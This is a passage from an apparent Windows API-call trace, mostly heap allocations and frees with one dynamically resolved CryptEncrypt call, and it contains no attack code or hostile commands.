hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e69b8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0197.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0197.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0197.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9d20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.103] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6508 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0197.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0197.104] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x77a7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x77a8) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0197.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0197.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0197.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0197.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0197.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0197.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0197.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0197.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.136] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0197.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0197.137] CharLowerBuffW (in: lpsz="byte[30632]", cchLength=0xb | out: lpsz="byte[30632]") returned 0xb [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0197.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0197.138] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0197.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 